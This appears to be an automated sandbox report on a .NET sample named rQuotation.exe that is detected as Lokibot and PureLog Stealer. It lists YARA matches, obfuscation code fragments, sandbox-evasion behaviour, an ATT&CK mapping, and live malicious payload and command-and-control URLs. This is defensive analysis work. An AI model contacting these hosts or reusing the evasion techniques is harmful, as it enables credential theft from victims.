Source: 0.2.rQuotation.exe.3a79570.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000000.00000002.1453520487.0000000002AEA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.1453841567.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.1453841567.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1453841567.0000000003A79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.1453841567.0000000003A79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.1453841567.0000000003A79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: rQuotation.exe PID: 7704, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23

Source: rQuotation.exe, R2B9rvTUcBlJKxCwXB.cs	Cryptographic APIs: 'CreateDecryptor'
Source: rQuotation.exe, R2B9rvTUcBlJKxCwXB.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/1@1/1

Source: C:\Users\user\Desktop\rQuotation.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rQuotation.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\rQuotation.exe

Mutant created: NULL

Source: rQuotation.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: rQuotation.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\rQuotation.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: rQuotation.exe

ReversingLabs: Detection: 26%

Source: C:\Users\user\Desktop\rQuotation.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Section loaded: gpapi.dll	Jump to behavior

Source: rQuotation.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: rQuotation.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: rQuotation.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: Bish.pdb source: rQuotation.exe
Source:	Binary string: Bish.pdbX source: rQuotation.exe

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: rQuotation.exe, R2B9rvTUcBlJKxCwXB.cs

.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

.NET source code contains potential unpacker

Source: rQuotation.exe, vZdXSljQFfvjfTd0v2.cs

.Net Code: ER08oLEsj System.Reflection.Assembly.Load(byte[])

Yara detected aPLib compressed binary

Source: Yara match	File source: 0.2.rQuotation.exe.3a79570.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.rQuotation.exe.3a79570.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1453841567.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1453841567.0000000003A79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rQuotation.exe PID: 7704, type: MEMORYSTR

Source: rQuotation.exe

Static PE information: 0x9E09E354 [Thu Jan 8 01:22:28 2054 UTC]

Source: C:\Users\user\Desktop\rQuotation.exe

Code function: 0_2_00D652A1 pushad ; ret

0_2_00D652A2

Source: rQuotation.exe, R2B9rvTUcBlJKxCwXB.cs

High entropy of concatenated method names: 'p4lOUHX5Uu', 'KDikMXewCI', 'a5MOAQ0sac', 'IfrOfLFje4', 'O9pOBSneGB', 'WDGOtrGYT0', 'm8uXwGgLu6bMV', 'rqMXVSw9O', 'rLVrbYVnH', 'TPnVoU3Xd'

Source: C:\Users\user\Desktop\rQuotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\rQuotation.exe	Memory allocated: D20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Memory allocated: 2A50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Memory allocated: 27E0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\rQuotation.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Thread delayed: delay time: 599078	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Thread delayed: delay time: 598969	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Thread delayed: delay time: 598844	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Thread delayed: delay time: 598734	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Thread delayed: delay time: 598625	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Thread delayed: delay time: 598473	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Thread delayed: delay time: 598357	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Thread delayed: delay time: 598246	Jump to behavior

Source: C:\Users\user\Desktop\rQuotation.exe	Window / User API: threadDelayed 2481			Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Window / User API: threadDelayed 407			Jump to behavior

Source: C:\Users\user\Desktop\rQuotation.exe TID: 7836	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe TID: 7836	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe TID: 7836	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe TID: 7840	Thread sleep count: 2481 > 30	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe TID: 7840	Thread sleep count: 407 > 30	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe TID: 7836	Thread sleep time: -599765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe TID: 7836	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe TID: 7836	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe TID: 7836	Thread sleep time: -599422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe TID: 7836	Thread sleep time: -599313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe TID: 7836	Thread sleep time: -599188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe TID: 7836	Thread sleep time: -599078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe TID: 7836	Thread sleep time: -598969s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe TID: 7836	Thread sleep time: -598844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe TID: 7836	Thread sleep time: -598734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe TID: 7836	Thread sleep time: -598625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe TID: 7836	Thread sleep time: -598473s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe TID: 7836	Thread sleep time: -598357s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe TID: 7836	Thread sleep time: -598246s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe TID: 7748	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\rQuotation.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Thread delayed: delay time: 599078	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Thread delayed: delay time: 598969	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Thread delayed: delay time: 598844	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Thread delayed: delay time: 598734	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Thread delayed: delay time: 598625	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Thread delayed: delay time: 598473	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Thread delayed: delay time: 598357	Jump to behavior
Source: C:\Users\user\Desktop\rQuotation.exe	Thread delayed: delay time: 598246	Jump to behavior

Source: rQuotation.exe, 00000000.00000002.1452848123.0000000000C02000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\rQuotation.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\rQuotation.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\rQuotation.exe

Queries volume information: C:\Users\user\Desktop\rQuotation.exe VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\rQuotation.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: 0.2.rQuotation.exe.3a79570.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1453841567.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1453841567.0000000003A79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rQuotation.exe PID: 7704, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: rQuotation.exe, type: SAMPLE
Source: Yara match	File source: 0.0.rQuotation.exe.580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1402328648.0000000000582000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY

Source: Yara match	File source: 0.2.rQuotation.exe.3a79570.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1453841567.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1453841567.0000000003A79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match	File source: rQuotation.exe, type: SAMPLE
Source: Yara match	File source: 0.0.rQuotation.exe.580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1402328648.0000000000582000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Masquerading	OS Credential Dumping	1 Security Software Discovery	Remote Services	11 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Disable or Modify Tools	LSASS Memory	31 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	31 Virtualization/Sandbox Evasion	Security Account Manager	1 Application Window Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	12 System Information Discovery	Distributed Component Object Model	Input Capture	14 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Software Packing	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Timestomp	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
rQuotation.exe	26%	ReversingLabs	Win32.Infostealer.Tinba
rQuotation.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://dddotx.shop/BISH_New.exe8https://dddotx.shop/DLLL.dll	100%	Avira URL Cloud	malware
https://dddotx.shop/BISH_New.exe	100%	Avira URL Cloud	malware
https://dddotx.shop/DLLL.dll:	100%	Avira URL Cloud	malware
https://dddotx.shop	100%	Avira URL Cloud	malware
http://dddotx.shop	100%	Avira URL Cloud	malware
https://dddotx.shop/DLLL.dll	100%	Avira URL Cloud	malware
http://dddotx.shopd	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
dddotx.shop	172.67.153.63	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://kbfvzoboss.bid/alien/fre.php	false		high
http://alphastand.top/alien/fre.php	false		high
https://dddotx.shop/DLLL.dll	false	Avira URL Cloud: malware	unknown
http://alphastand.win/alien/fre.php	false		high
https://dddotx.shop/BISH_New.exe	false	Avira URL Cloud: malware	unknown
http://alphastand.trade/alien/fre.php	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.cloudflare.com/learning/access-management/phishing-attack/	rQuotation.exe, 00000000.00000002.1453520487.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	false		high
https://dddotx.shop/DLLL.dll:	rQuotation.exe, 00000000.00000002.1453520487.0000000002B68000.00000004.00000800.00020000.00000000.sdmp, rQuotation.exe, 00000000.00000002.1453520487.0000000002AC9000.00000004.00000800.00020000.00000000.sdmp, rQuotation.exe, 00000000.00000002.1453520487.0000000002AB2000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://dddotx.shopd	rQuotation.exe, 00000000.00000002.1453520487.0000000002AC9000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ibsensoftware.com/	rQuotation.exe, 00000000.00000002.1453841567.0000000003A79000.00000004.00000800.00020000.00000000.sdmp, rQuotation.exe, 00000000.00000002.1453841567.0000000003A59000.00000004.00000800.00020000.00000000.sdmp	false		high
https://dddotx.shop	rQuotation.exe, 00000000.00000002.1453520487.0000000002AB2000.00000004.00000800.00020000.00000000.sdmp, rQuotation.exe, 00000000.00000002.1453520487.0000000002B0D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	rQuotation.exe, 00000000.00000002.1453520487.0000000002AB2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://dddotx.shop	rQuotation.exe, 00000000.00000002.1453520487.0000000002AC9000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.cloudflare.com/5xx-error-landing	rQuotation.exe, 00000000.00000002.1453520487.0000000002B68000.00000004.00000800.00020000.00000000.sdmp, rQuotation.exe, 00000000.00000002.1453520487.0000000002AE2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://dddotx.shop/BISH_New.exe8https://dddotx.shop/DLLL.dll	rQuotation.exe, 00000000.00000002.1453520487.0000000002AB2000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.153.63	dddotx.shop	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1576016
Start date and time:	2024-12-16 13:14:03 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 2m 11s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	2
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	rQuotation.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/1@1/1
EGA Information:	Failed
HCA Information:	Successful, ratio: 67% Number of executed functions: 4 Number of non-executed functions: 4
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): dllhost.exe
Execution Graph export aborted for target rQuotation.exe, PID 7704 because it is empty
Report size getting too big, too many NtOpenKeyEx calls found.
